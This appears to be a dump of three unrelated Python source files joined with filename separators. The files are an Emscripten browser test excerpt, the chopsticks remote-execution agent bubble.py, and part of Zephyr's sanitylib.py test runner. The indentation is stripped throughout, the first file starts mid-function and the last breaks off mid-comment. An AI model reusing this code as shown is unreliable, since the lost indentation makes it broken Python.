# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('browser', 'test_4GB.cpp')
# Tests that emmalloc supports up to 4GB Wasm heaps.
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_4gb(self):
self.btest(test_file('mem_growth.cpp'),
expected='-65536', # == 4*1024*1024*1024 - 65536 cast to signed
args=['-s', 'MALLOC=emmalloc', '-s', 'ABORTING_MALLOC=0', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'MAXIMUM_MEMORY=4GB'])
# Test that it is possible to malloc() a huge 3GB memory block in 4GB mode using emmalloc.
# Also test emmalloc-memvalidate and emmalloc-memvalidate-verbose build configurations.
@no_firefox('no 4GB support yet')
def test_emmalloc_3GB(self):
def test(args):
self.btest_exit(test_file('alloc_3gb.cpp'),
args=['-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ALLOW_MEMORY_GROWTH=1'] + args)
test(['-s', 'MALLOC=emmalloc'])
test(['-s', 'MALLOC=emmalloc-debug'])
test(['-s', 'MALLOC=emmalloc-memvalidate'])
test(['-s', 'MALLOC=emmalloc-memvalidate-verbose'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_memgrowth(self, *args):
self.btest(test_file('browser/emmalloc_memgrowth.cpp'), expected='0', args=['-s', 'MALLOC=emmalloc', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'ABORTING_MALLOC=0', '-s', 'ASSERTIONS=2', '-s', 'MINIMAL_RUNTIME=1', '-s', 'MAXIMUM_MEMORY=4GB'])
@no_firefox('no 4GB support yet')
@require_v8
def test_zzz_zzz_2gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('browser', 'test_2GB_fail.cpp')
@no_firefox('no 4GB support yet')
@require_v8
def test_zzz_zzz_4gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ABORTING_MALLOC=0']
self.do_run_in_out_file_test('browser', 'test_4GB_fail.cpp')
# Tests that Emscripten-compiled applications can be run when there is a slash in the URL query or fragment of the js file
def test_browser_run_with_slash_in_query_and_hash(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O0'])
src = open('test.html').read()
# Slash in query
create_file('test-query.html', src.replace('test.js', 'test.js?type=pass/fail'))
self.run_browser('test-query.html', None, '/report_result?0')
# Slash in fragment
create_file('test-hash.html', src.replace('test.js', 'test.js#pass/fail'))
self.run_browser('test-hash.html', None, '/report_result?0')
# Slash in query and fragment
create_file('test-query-hash.html', src.replace('test.js', 'test.js?type=pass/fail#pass/fail'))
self.run_browser('test-query-hash.html', None, '/report_result?0')
@disabled("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-s', 'ASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# The specific symptom of the hang that was fixed is that the test hangs
# at some point, using 0% CPU. Often that occurred within 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest_exit(test_file('pthread/test_pthread_proxy_hammer.cpp'),
args=['-s', 'USE_PTHREADS', '-O2', '-s', 'PROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
def test_assert_failure(self):
self.btest(test_file('browser/test_assert_failure.c'), 'abort:Assertion failed: false && "this is a test"')
def test_full_js_library_strict(self):
self.btest_exit(test_file('hello_world.c'), args=['-sINCLUDE_FULL_LIBRARY', '-sSTRICT_JS'])
EMRUN = path_from_root('emrun')
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([EMRUN, '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([EMRUN, '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_no_browser(self):
# Test --no_browser mode where we have to take care of launching the browser ourselves
# and then killing emrun when we are done.
if not has_browser():
self.skipTest('need a browser')
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
proc = subprocess.Popen([EMRUN, '--no_browser', '.', '--port=3333'], stdout=PIPE)
try:
if EMTEST_BROWSER:
print('Starting browser')
browser_cmd = shlex.split(EMTEST_BROWSER)
browser = subprocess.Popen(browser_cmd + ['http://localhost:3333/hello_world.html'])
try:
while True:
stdout = proc.stdout.read()
if b'Dumping out file' in stdout:
break
finally:
print('Terminating browser')
browser.terminate()
browser.wait()
finally:
print('Terminating emrun server')
proc.terminate()
proc.wait()
def test_emrun(self):
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the
# browser that is launched will have that directory as its startup directory, and the browser will
# not close as part of the test, pinning down the cwd on Windows and making it impossible to
# delete. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [EMRUN, '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass an argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser
# (e.g. "firefox -profile /path/to/foo"), those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
stdout = read_file(self.in_dir('stdout.txt'))
stderr = read_file(self.in_dir('stderr.txt'))
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
|
bubble.py
|
from __future__ import print_function
import sys
sys.path = [p for p in sys.path if p.startswith('/')]
__name__ = '__bubble__'
sys.modules[__name__] = sys.modules.pop('__main__')
def debug(msg):
print(msg, file=sys.stderr)
# Reshuffle fds so that we can't break our transport by printing to stdout
import os
# inpipe is defined in the bootstrap command line code in tunnel.py
outfd = os.dup(1)
outpipe = os.fdopen(outfd, 'wb', 0)
sys.stdin.close()
sys.stdin = open(os.devnull, 'r')
sys.stdout.close()
sys.stdout = open(os.devnull, 'w')
PY2 = sys.version_info < (3,)
PY3 = not PY2
import threading
if PY2:
__metaclass__ = type
from Queue import Queue
import cPickle as pickle
def exec_(_code_, _globs_=None, _locs_=None):
"""Execute code in a namespace."""
if _globs_ is None:
frame = sys._getframe(1)
_globs_ = frame.f_globals
if _locs_ is None:
_locs_ = frame.f_locals
del frame
elif _locs_ is None:
_locs_ = _globs_
exec("""exec _code_ in _globs_, _locs_""")
range = xrange
else:
from queue import Queue
import pickle
exec_ = getattr(__builtins__, 'exec')
from imp import is_builtin
import time
import struct
import imp
from collections import namedtuple
import signal
from hashlib import sha1
import traceback
from base64 import b64decode
import tempfile
import codecs
outqueue = Queue(maxsize=10)
tasks = Queue()
done = object()
running = True
Imp = namedtuple('Imp', 'exists is_pkg file source')
PREFIX = 'chopsticks://'
class Loader:
# Imports that don't succeed after this amount of time will time out
# This can help crash a remote process when the controller hangs, thus
# breaking the deadlock.
TIMEOUT = 5 # seconds
cache = {}
lock = threading.RLock()
ev = threading.Condition(lock)
def __init__(self, path):
if not path.startswith(PREFIX):
raise ImportError()
self.path = path
@classmethod
def on_receive(cls, mod, imp):
with cls.lock:
if isinstance(mod, list):
mod = tuple(mod)
cls.cache[mod] = imp
cls.ev.notifyAll()
def _raw_get(self, fullname):
with self.lock:
if fullname in self.cache:
return self.cache[fullname]
send_msg(OP_IMP, 0, {'imp': fullname})
start = time.time()
self.ev.wait(timeout=self.TIMEOUT)
delay = time.time() - start
if delay >= self.TIMEOUT:
raise IOError(
'Timed out after %ds waiting for import %r'
% (self.TIMEOUT, fullname)
)
try:
imp = self.cache[fullname]
except KeyError:
raise IOError(
'Did not find %s in %s' % (fullname, self.cache)
)
return imp
def get(self, fullname):
if isinstance(fullname, str) and is_builtin(fullname) != 0:
raise ImportError()
imp = self._raw_get(fullname)
if not imp.exists:
raise ImportError()
return imp
def find_module(self, fullname, path=None):
try:
self.get(fullname)
except ImportError:
return None
return self
def load_module(self, fullname):
m = self.get(fullname)
modname = fullname
if fullname == '__main__':
# Special-case __main__ so as not to execute
# if __name__ == '__main__' blocks
modname = '__chopsticks_main__'
mod = sys.modules.setdefault(modname, imp.new_module(modname))
mod.__file__ = PREFIX + m.file
mod.__loader__ = self
if m.is_pkg:
modpath = PREFIX + m.file.rsplit('/', 1)[0] + '/'
mod.__path__ = [modpath]
mod.__package__ = modname
#mod.__loader__ = Loader(modpath)
else:
mod.__package__ = modname.rpartition('.')[0]
code = compile(m.source, mod.__file__, 'exec', dont_inherit=True)
exec(code, mod.__dict__)
if fullname == '__main__':
mod.__name__ = '__main__'
sys.modules[fullname] = mod
return mod
def is_package(self, fullname):
return self.get(fullname).is_pkg
def get_source(self, fullname):
return self.get(fullname).source.decode('utf8')
def get_data(self, path):
"""Get package data from host."""
mod = self.path.rsplit('/', 2)[-2]
relpath = path[len(self.path):]
imp = self.get((mod, relpath))
return imp.source
sys.path.append(PREFIX)
sys.path_hooks.append(Loader)
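# A minimal sketch of how the import hook above is exercised (the module name is
# hypothetical, and nothing below runs as part of this file):
#
#   loader = Loader('chopsticks://')     # accepted because the path starts with PREFIX
#   loader.find_module('mypkg.mymod')    # sends OP_IMP and waits on Loader.ev for the source
#   loader.load_module('mypkg.mymod')    # compiles the received source and executes it
#
# The source itself arrives from the controller via handle_imp(), which fills
# Loader.cache and wakes any waiting importers.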
def transmit_errors(func):
def wrapper(req_id, *args, **kwargs):
try:
return func(req_id, *args, **kwargs)
except:
send_msg(OP_EXC, req_id, {'tb': traceback.format_exc()})
return wrapper
@transmit_errors
def handle_call_threaded(req_id, data):
threading.Thread(target=handle_call_thread, args=(req_id, data)).start()
@transmit_errors
def handle_call_thread(req_id, data):
callable, args, kwargs = pickle.loads(data)
do_call(req_id, callable, args, kwargs)
@transmit_errors
def handle_call_queued(req_id, data):
callable, args, kwargs = pickle.loads(data)
tasks.put((req_id, callable, args, kwargs))
OP_CALL = 0
OP_RET = 1
OP_EXC = 2
OP_IMP = 3
OP_FETCH_BEGIN = 4
OP_FETCH_DATA = 5
OP_FETCH_END = 6
OP_PUT_BEGIN = 7
OP_PUT_DATA = 8
OP_PUT_END = 9
OP_START = 10
# FIXME: handle_call_queued seems to deadlock!
handle_call = handle_call_threaded
@transmit_errors
def handle_fetch(req_id, path):
"""Fetch a file by path."""
tasks.put((req_id, do_fetch, (req_id, path,)))
def do_fetch(req_id, path):
"""Send chunks of a file to the orchestration host."""
h = sha1()
with open(path, 'rb') as f:
while True:
chunk = f.read(10240)
if not chunk:
break
h.update(chunk)
send_msg(OP_FETCH_DATA, req_id, chunk)
return {
'remote_path': str(os.path.abspath(path)),
'sha1sum': h.hexdigest(),
}
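# A rough sketch of the message flow for one fetch request, based on the code
# above (the req_id and path are hypothetical):
#
#   controller -> agent : OP_FETCH_BEGIN, req_id=5, path='/etc/hostname'
#   agent -> controller : OP_FETCH_DATA,  req_id=5, chunk of up to 10240 bytes (repeated)
#   agent -> controller : OP_RET,         req_id=5, {'ret': {'remote_path': ..., 'sha1sum': ...}}
#
# The final OP_RET frame is emitted by do_call() once do_fetch() returns.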
@transmit_errors
def do_call(req_id, callable, args=(), kwargs={}):
ret = callable(*args, **kwargs)
send_msg(
OP_RET,
req_id,
{
'ret': ret,
# 'callable': callable.__module__ + '.' + callable.__name__
}
)
def handle_imp(req_id, mod, exists, is_pkg, file, source):
Loader.on_receive(mod, Imp(exists, is_pkg, file, source))
active_puts = {}
def force_str(s):
if not isinstance(s, str):
return s.decode()
return s
@transmit_errors
def handle_begin_put(req_id, path, mode):
prev_umask = os.umask(0o077)
try:
if path is None:
f = tempfile.NamedTemporaryFile(delete=False)
path = wpath = f.name
else:
path = force_str(path)
if os.path.isdir(path):
raise IOError('%s is a directory' % path)
wpath = path + '~chopsticks-tmp'
f = open(wpath, 'wb')
finally:
os.umask(prev_umask)
os.fchmod(f.fileno(), mode)
active_puts[req_id] = (f, wpath, path, sha1())
@transmit_errors
def handle_put_data(req_id, data):
try:
f, wpath, path, cksum = active_puts[req_id]
except KeyError:
# Likely we have crashed out already
return
try:
cksum.update(data)
f.write(data)
except:
try:
os.unlink(wpath)
f.close()
except OSError:
pass
raise
class ChecksumMismatch(Exception):
pass
@transmit_errors
def handle_end_put(req_id, sha1sum):
try:
f, wpath, path, cksum = active_puts.pop(req_id)
except KeyError:
# Likely we have crashed out already
return
received = f.tell()
f.close()
digest = cksum.hexdigest()
sha1sum = force_str(sha1sum)
if digest != sha1sum:
try:
os.unlink(wpath)
except OSError:
pass
raise ChecksumMismatch(
'Checksum failed for transfer %s (%r != %r)' %
(path, digest, sha1sum)
)
if wpath != path:
os.rename(wpath, path)
send_msg(
OP_RET, req_id, {'ret': {
'remote_path': os.path.abspath(path),
'sha1sum': digest,
'size': received
}}
)
def handle_start(req_id, host, path, depthlimit):
sys._chopsticks_host = force_str(host)
sys._chopsticks_path = [force_str(p) for p in path]
sys._chopsticks_depthlimit = depthlimit
send_msg(OP_RET, req_id, {'ret': pickle.HIGHEST_PROTOCOL})
HEADER = struct.Struct('!LLbb')
MSG_BYTES = 1
MSG_PENCODE = 2
def send_msg(op, req_id, data):
"""Send a message to the orchestration host.
We can send either raw bytes or pencode-encoded structured data; the fmt
field in the frame header records which encoding was used.
"""
if isinstance(data, bytes):
fmt = MSG_BYTES
else:
fmt = MSG_PENCODE
data = pencode(data)
chunk = HEADER.pack(len(data), req_id, op, fmt) + data
outqueue.put(chunk)
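# Sketch of the resulting wire format, following HEADER = struct.Struct('!LLbb')
# above (the concrete values are only illustrative):
#
#   | length (4B, big-endian) | req_id (4B) | op (1B) | fmt (1B) | payload ... |
#
# e.g. send_msg(OP_RET, 7, {'ret': 0}) enqueues
#   HEADER.pack(len(pencode({'ret': 0})), 7, OP_RET, MSG_PENCODE) + pencode({'ret': 0})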
def read_msg():
buf = inpipe.read(HEADER.size)
if not buf:
return
(size, req_id, op, fmt) = HEADER.unpack(buf)
data = inpipe.read(size)
if fmt == MSG_BYTES:
obj = {'data': data}
elif fmt == MSG_PENCODE:
obj = pdecode(data)
else:
debug('Unknown message format %s' % fmt)
return
return (req_id, op, obj)
HANDLERS = {
OP_CALL: handle_call,
OP_IMP: handle_imp,
OP_FETCH_BEGIN: handle_fetch,
OP_PUT_BEGIN: handle_begin_put,
OP_PUT_DATA: handle_put_data,
OP_PUT_END: handle_end_put,
OP_START: handle_start,
}
def reader():
try:
while True:
msg = read_msg()
if msg is None:
break
req_id, op, params = msg
if PY2:
params = dict((str(k), v) for k, v in params.iteritems())
else:
params = dict((force_str(k), v) for k, v in params.items())
HANDLERS[op](req_id, **params)
finally:
outqueue.put(done)
tasks.put(done)
def writer():
while True:
msg = outqueue.get()
if msg is done:
break
outpipe.write(msg)
def run():
for func in (reader, writer):
threading.Thread(target=func).start()
while True:
task = tasks.get()
if task is done:
break
do_call(*task)
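# Sketch of the thread layout that run() sets up (thread names are descriptive only):
#
#   reader thread : read_msg() -> HANDLERS[op](...)  (calls may spawn their own threads)
#   writer thread : outqueue   -> outpipe            (serialises all outgoing frames)
#   main thread   : tasks      -> do_call(...)       (queued work such as fetches)
#
# Both queues are shut down via the `done` sentinel once the input pipe closes.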
# The source code from chopsticks.pencode will be substituted here
# We do this at the end to minimise changes to line numbers
{{ PENCODE }}
run()
|
sanitylib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
from threading import BoundedSemaphore
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import yaml
import platform
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib
hw_map_local = threading.Lock()
report_lock = threading.Lock()
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
from sanity_chk import scl
from sanity_chk import expr_parser
logger = logging.getLogger('sanitycheck')
logger.setLevel(logging.DEBUG)
pipeline = queue.LifoQueue()
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
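# Illustrative examples of the conversions described in the docstring above
# (the entry names are hypothetical; nothing here is executed):
#
#   CMakeCacheEntry.from_line('CONFIG_FOO:BOOL=ON', 1).value      -> 1
#   CMakeCacheEntry.from_line('CFLAGS:STRING=-Os;-g', 2).value    -> ['-Os', '-g']
#   CMakeCacheEntry.from_line('// comment line', 3)               -> None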
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class SanityCheckException(Exception):
pass
class SanityRuntimeError(SanityCheckException):
pass
class ConfigurationError(SanityCheckException):
def __init__(self, cfile, message):
SanityCheckException.__init__(self, cfile + ": " + message)
class BuildError(SanityCheckException):
pass
class ExecutionError(SanityCheckException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/sanity_chk"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.lock = threading.Lock()
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.lock.acquire()
self.state = state
self.duration = duration
self.lock.release()
def get_state(self):
self.lock.acquire()
ret = (self.state, self.duration)
self.lock.release()
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
# Encapsulate the terminate functionality so we do it consistently wherever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of how both newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja versions don't seem to pass SIGTERM down to the children,
# so we need to use try_kill_process_by_pid.
self.try_kill_process_by_pid()
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc, harness):
log_out_fp = open(self.log, "wt")
for line in iter(proc.stdout.readline, b''):
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
break
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_reader, args=(proc, harness,), daemon=True)
t.start()
t.join(self.timeout)
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
self.try_kill_process_by_pid()
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
ser.close()
break
log_out_fp.close()
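# Note on the halt mechanism used above: handle() below creates an os.pipe()
# pair and passes the read end in as halt_fileno; writing b'x' to the write
# end (as the flash error path does) makes halt_fileno readable here, so the
# monitor closes the serial port and stops.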
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for i in self.suite.connected_hardware:
if fixture and fixture not in i.get('fixtures', []):
continue
if i['platform'] == device and i['available'] and i['serial']:
return True
return False
def get_available_device(self, instance):
device = instance.platform.name
for i in self.suite.connected_hardware:
if i['platform'] == device and i['available'] and i['serial']:
i['available'] = False
i['counter'] += 1
return i
return None
def make_device_available(self, serial):
with hw_map_local:
for i in self.suite.connected_hardware:
if i['serial'] == serial:
i['available'] = True
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
if self.suite.west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
if self.suite.west_runner:
command.append("--runner")
command.append(self.suite.west_runner)
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
